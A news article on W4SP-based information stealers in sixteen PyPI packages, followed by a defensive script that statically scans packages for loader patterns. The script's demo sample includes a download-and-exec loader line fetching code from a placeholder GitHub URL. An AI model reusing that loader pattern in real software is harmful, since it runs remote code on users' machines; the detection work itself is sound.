Hackers bombard PyPI platform with information-stealing malware


The PyPI Python package repository is being bombarded by a wave of information-stealing malware hidden inside malicious packages uploaded to the platform to steal software developers’ data.

The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022.

Since then, an additional 31 packages dropping ‘W4SP’ have been removed from the PyPI repository, with the malware’s operators continuing to seek new ways to reintroduce their malware on the platform.

Targeting open-source developers

Last week, the Phylum research team reported it had found another set of 47 packages that distributed W4SP on PyPI. However, this operation was disrupted after GitHub terminated the repository used by the threat actor for fetching the primary payload.

The cybersecurity firm reported yesterday that at least 16 packages on PyPI are spreading ten different information-stealing malware variants based on W4SP Stealer.

The malicious packages that contain these information stealers are:

  • modulesecurity – 114 downloads
  • informmodule – 110 downloads
  • chazz – 118 downloads
  • randomtime – 118 downloads
  • proxygeneratorbil – 91 downloads
  • easycordey – 122 downloads
  • easycordeyy – 103 downloads
  • tomproxies – 150 downloads
  • sys-ej – 186 downloads
  • py4sync – 453 downloads
  • infosys – 191 downloads
  • sysuptoer – 186 downloads
  • nowsys – 202 downloads
  • upamonkws – 205 downloads
  • captchaboy – 123 downloads
  • proxybooster – 69 downloads

While these packages drop stealers that use different names, like Celestial Stealer, ANGEL stealer, Satan Stealer, @skid Stealer, and Leaf $tealer, Phylum has found that they are all based on the W4SP code.

“Each deployment appears to have simply tried to do a find/replace of the W4SP references in exchange for some other seemingly arbitrary name. In some cases, not all references were removed and trace strings of ‘W4SP’ remain.” – Phylum.

With one exception, “chazz,” the new stealers do not follow W4SP’s complex attack chain that features multiple stages and code obfuscation.

Instead, they drop the stealer’s code directly into the “main.py” or the “__init__.py” files with no encoding or obfuscation, so a basic code review immediately reveals their nature.

Informmodule ‘__init__.py’ code (Phylum)

The “chazz” package, which drops a copy of the “Leaf $tealer,” is the only one of the new batch that features some obfuscation via the BlankOBF tool, but it’s still reasonably easy to deobfuscate.

Following the same tactics as with the W4SP operation, the new stealers use GitHub repositories as a remote resource for downloading the malware payload.
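The two observations above, that the stealer code sits in plain sight in `__init__.py` or `main.py` and that the loader fetches its payload from a GitHub repository, are enough for a first-pass static triage of a downloaded package before anyone runs `pip install` on it. The following script is an added example written for this article; it is not Phylum’s tooling and not code from any of the packages listed. It parses each `.py` file with the standard-library `ast` module without importing or executing it (important, since these packages fire at import time) and flags three indicators drawn from the text: string literals pointing at GitHub hosts, `exec()`/`eval()` applied to something fetched over HTTP, and leftover “W4SP” strings from a careless find/replace. The host list, rule names and the two sample `__init__.py` files written by `demo()` are constructed for the demonstration; the placeholder URL is not a real repository.

```python
"""Static triage of an unpacked Python package for the loader patterns described above.

Added example, not Phylum's tooling and not code from any package named in the article.
Files are parsed with `ast` and never imported, so nothing in the package gets to run.
Rules (all taken from the article's description of the packages):
  github-url        string literal pointing at github.com / githubusercontent.com
  exec-of-download  exec()/eval() applied to the result of an HTTP fetch
  w4sp-residue      leftover "W4SP" string from a sloppy find/replace
The sample files created by demo() are constructed for this example; they are not malware.
"""
import ast
import pathlib
import re
import tempfile
from collections import Counter
from dataclasses import dataclass

PAYLOAD_HOSTS = ("github.com", "githubusercontent.com")   # assumed indicator list
RESIDUE = re.compile(r"w4sp", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    detail: str


def _is_fetch(call: ast.Call) -> bool:
    """requests.get/post(...), urlopen(...), urllib.request.urlopen(...), urlretrieve(...)."""
    f = call.func
    if isinstance(f, ast.Attribute):
        base = f.value.id if isinstance(f.value, ast.Name) else ""
        return (base == "requests" and f.attr in {"get", "post"}) or f.attr in {"urlopen", "urlretrieve"}
    return isinstance(f, ast.Name) and f.id in {"urlopen", "urlretrieve"}


def _contains_fetch(node: ast.AST) -> bool:
    return any(isinstance(n, ast.Call) and _is_fetch(n) for n in ast.walk(node))


def scan_source(src: str, path: str = "<string>") -> list[Finding]:
    """Return findings for one Python source file (parsed, never executed)."""
    try:
        tree = ast.parse(src, filename=path)
    except SyntaxError as exc:
        # A file pip would happily install but Python cannot parse deserves a manual look.
        return [Finding(path, exc.lineno or 0, "unparseable", str(exc.msg))]
    findings: list[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value for h in PAYLOAD_HOSTS):
                findings.append(Finding(path, node.lineno, "github-url", node.value))
            if RESIDUE.search(node.value):
                findings.append(Finding(path, node.lineno, "w4sp-residue", node.value))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in {"exec", "eval"}
              and any(_contains_fetch(a) for a in node.args)):
            # exec(requests.get(url).text) / exec(urlopen(url).read()): a second-stage loader
            findings.append(Finding(path, node.lineno, "exec-of-download", ast.unparse(node)[:80]))
    return findings


def scan_package(root: pathlib.Path) -> list[Finding]:
    """Scan every .py under an unpacked sdist/wheel or a site-packages directory.

    The article's packages keep the stealer in main.py or __init__.py; scanning all
    modules is a generalization, since setup.py is another common place for a loader.
    """
    out: list[Finding] = []
    for py in sorted(root.rglob("*.py")):
        src = py.read_text(encoding="utf-8", errors="replace")
        out.extend(scan_source(src, str(py.relative_to(root))))
    return out


# Constructed samples for the demo. The URL is a placeholder, not a real repository.
CLEAN_INIT = (
    "import json\n"
    "def load(path):\n"
    "    with open(path) as fh:\n"
    "        return json.load(fh)\n"
)
SUSPECT_INIT = (
    "import requests\n"
    'URL = "https://raw.githubusercontent.com/example-org/example-repo/main/payload.py"\n'
    "exec(requests.get(URL).text)\n"
    'BANNER = "W4SP stealer"\n'
)


def demo() -> dict[str, int]:
    """Write both samples to a temp tree, scan it, print hits and return rule -> count."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        for name, body in (("cleanpkg", CLEAN_INIT), ("suspectpkg", SUSPECT_INIT)):
            (root / name).mkdir()
            (root / name / "__init__.py").write_text(body, encoding="utf-8")
        findings = scan_package(root)
        for f in findings:
            print(f"{f.path}:{f.line} [{f.rule}] {f.detail}")
        return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    demo()
```

Run it against a package unpacked with `pip download --no-deps <name>` followed by `tar xf` or `unzip`, not against one that is already installed. A hit on `exec-of-download` or `github-url` in an `__init__.py` is not proof of malice on its own (plenty of legitimate packages mention GitHub in a docstring), but it is exactly the pattern Phylum describes and is cheap to review by hand.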

The GitHub repository of Satan Stealer (Phylum)

It is unclear whether these malware “clones” are operated by the same threat actors behind W4SP or its copycats, but Phylum hypothesizes it’s from different groups that attempt to mimic previous campaigns.

All the packages presented in this report have been removed from the PyPI repository, but not before they were downloaded over 2,500 times.

Hackers have been increasingly targeting open-source package repositories, as compromising developers’ systems offers an opportunity for even larger attacks.

As developers commonly store authorization tokens and API keys in their applications, stealing these secrets could allow threat actors to conduct more widespread supply chain attacks or steal data for use in extortion demands.

As long as the infection numbers make an effort worthwhile, we will continue to see threat actors uploading malicious packages on open-source repositories under different names and accounts.
